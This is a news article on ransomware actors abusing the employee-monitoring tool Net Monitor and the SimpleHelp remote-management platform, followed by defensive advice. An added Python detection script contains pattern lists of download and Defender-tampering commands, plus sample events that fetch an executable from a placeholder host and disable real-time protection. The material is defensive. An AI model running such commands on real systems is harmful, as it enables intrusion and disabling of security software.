Ransomware gangs are using employee monitoring software as a springboard for cyber attacks
Two attempted attacks aimed to exploit Net Monitor for Employees Professional and SimpleHelp
Hackers are targeting a popular workforce monitoring tool and using it as a basis for ransomware attacks.
Net Monitor for Employees Professional is a staff productivity tracking tool from NetworkLookout, with features including reverse shell connections, remote desktop control, file management, and the ability to customize service and process names during installation.
In late January and early February, Huntress said its Tactical Response team spotted two separate intrusions in which threat actors chained Net Monitor with SimpleHelp in attempted ransomware attacks.
SimpleHelp is a legitimate remote monitoring and management (RMM) platform widely used by IT teams and managed service providers.
"Shared infrastructure, overlapping IOCs, and consistent tradecraft across both cases strongly suggest a single threat actor or group behind this activity," researchers said.
The threat actors used Net Monitor for Employees as a primary remote access channel, with SimpleHelp used as a redundant persistence layer. This allowed them to blend in with normal traffic, ultimately leading to the attempted – but on these occasions unsuccessful – deployment of Crazy ransomware.
"Threat actors leveraged this capability for hands-on-keyboard reconnaissance, additional tooling delivery, and deploying secondary remote access channels, effectively turning an employee monitoring tool into a fully functional RAT (remote access trojan)," said the team.
In the first case, it's not clear how the attackers gained initial access, but they went on to start trawling around user accounts and attempting to change passwords and create new user accounts. Huntress spotted Net Monitor for Employees' terminal pulling down a file via PowerShell that turned out to be SimpleHelp.
Luckily, attempts to tamper with Windows Defender and deploy multiple versions of Crazy ransomware failed.
In the second case, a threat actor leveraged a compromised vendor's SSL VPN account to gain initial access, then launched an interactive PowerShell session to begin staging their tooling.
They installed SimpleHelp and configured it to monitor for certain keywords.
"Interestingly enough, the SimpleHelp agent was also configured with keyword-based monitoring triggers via GlobalEvents, revealing the threat actor's financial motivation," said the team.
These included wallet services (metamask, exodus, wallet, blockchain), exchanges (binance, bybit, kucoin, bitrue, poloniex, bc.game, noones), blockchain explorers (etherscan, bscscan), and the payment platform payoneer.
How enterprises can shore up defenses
Huntress recommends the use of multi-factor authentication (MFA) on all remote access services, administrative accounts, and external-facing applications and adopting the principle of least privilege.
Networks should be logically separated to prevent lateral movement and all external-facing applications and devices - especially VPN and RDP gateways - should be patched immediately and monitored for anomalous login attempts.
Similarly, third-party software should be regularly audited, with user permissions limited. Elsewhere, Huntress said enterprises should monitor for unusual process execution chains and configure alerts for any attempts to modify or disable security software.
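The two monitoring recommendations above, watching for unusual process execution chains and alerting on attempts to disable security software, map directly onto the behaviour described in the first case: a monitoring tool's terminal spawning PowerShell to pull down a second remote-access agent, followed by tampering with Windows Defender. The following Python script is an added example of that detection logic run over constructed Sysmon-style process-creation events; it is not code from Huntress, NetworkLookout or ITPro. The field names mirror Sysmon Event ID 1 (ParentImage, Image, CommandLine), the parent process name `monitor_agent.exe` and the install path are placeholders rather than the real Net Monitor for Employees binary, the allowlist of expected shell parents is an assumption to be tuned per environment, and the sample events and the 198.51.100.7 address are constructed, not indicators from the incidents.

```python
"""Flag suspicious process-creation chains in Sysmon-style events.

Added example for illustration; not code from Huntress, NetworkLookout or
ITPro.  Field names mirror Sysmon Event ID 1 (ParentImage, Image,
CommandLine).  'monitor_agent.exe' is a placeholder, not the real Net
Monitor for Employees binary, and the sample events are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Interpreters whose parent process is worth scrutinising.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Parents from which a shell is routinely launched by a user or the OS.
# Assumption: tune this allowlist per environment.  It is kept short so that
# any remote-management or monitoring agent launching a shell stands out.
EXPECTED_SHELL_PARENTS = {
    "explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe",
}

# PowerShell download cradles: the pattern the article describes, where the
# monitoring tool's terminal pulls a second payload over the network.
DOWNLOAD_CRADLE = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer|"
    r"DownloadFile|DownloadString|curl|wget|bitsadmin)\b",
    re.IGNORECASE,
)

# Attempts to weaken Microsoft Defender: any Set-MpPreference call with a
# -Disable* switch, or an Add-MpPreference exclusion, regardless of parent.
SECURITY_TAMPER = re.compile(
    r"\bSet-MpPreference\b.*-Disable\w*|\bAdd-MpPreference\b.*-Exclusion\w*",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify(event: ProcessEvent) -> List[str]:
    """Return the findings for one event (empty list when it looks benign)."""
    findings: List[str] = []
    child = basename(event.image)
    parent = basename(event.parent_image)

    if child in SHELLS and parent not in EXPECTED_SHELL_PARENTS:
        # The chain is the signal, not the parent's name: Net Monitor lets the
        # installer rename its service and process, so name matching is brittle.
        findings.append("shell_from_unexpected_parent")
        if DOWNLOAD_CRADLE.search(event.command_line):
            findings.append("download_cradle")

    if SECURITY_TAMPER.search(event.command_line):
        findings.append("security_software_tamper")

    return findings


def scan(events: List[ProcessEvent]) -> List[Tuple[int, List[str]]]:
    """Return (index, findings) for every event with at least one finding."""
    results: List[Tuple[int, List[str]]] = []
    for idx, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results.append((idx, hits))
    return results


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry (not from the Huntress cases).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 "powershell.exe Get-ChildItem C:\\Users"),
    ProcessEvent(r"C:\Program Files\WorkforceMonitor\monitor_agent.exe", PS,  # placeholder
                 "powershell.exe -NoProfile Invoke-WebRequest -Uri http://198.51.100.7/rmm_setup.exe "
                 "-OutFile C:\\Users\\Public\\rmm_setup.exe"),
    ProcessEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
                 "svchost.exe -k netsvcs"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS,
                 "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"),
]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"event {idx}: {basename(ev.parent_image)} -> {basename(ev.image)}: {', '.join(hits)}")
```

Run against the constructed events, the benign explorer-launched shell and the service host produce nothing, the placeholder monitoring agent spawning a PowerShell download cradle produces two findings, and the Defender tampering command is flagged even though its parent is an allowlisted shell. In production the same logic would sit over a Sysmon or EDR process-creation feed rather than an inline list.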
Huntress warned these cases highlight a growing trend of threat actors leveraging legitimate, commercially available software to blend into enterprise environments.
"Net Monitor for Employees Professional, while marketed as a workforce monitoring tool, provides capabilities that rival traditional remote access trojans: reverse connections over common ports, process and service name masquerading, built-in shell execution, and the ability to silently deploy via standard Windows installation mechanisms," they wrote.
"When paired with SimpleHelp as a secondary access channel, complete with keyword-based monitoring triggers targeting cryptocurrency activity, the result is a resilient, dual-tool foothold that is difficult to distinguish from legitimate administrative software."
Emma Woollacott is a freelance journalist writing for publications including the BBC, Private Eye, Forbes, Raconteur and specialist technology titles.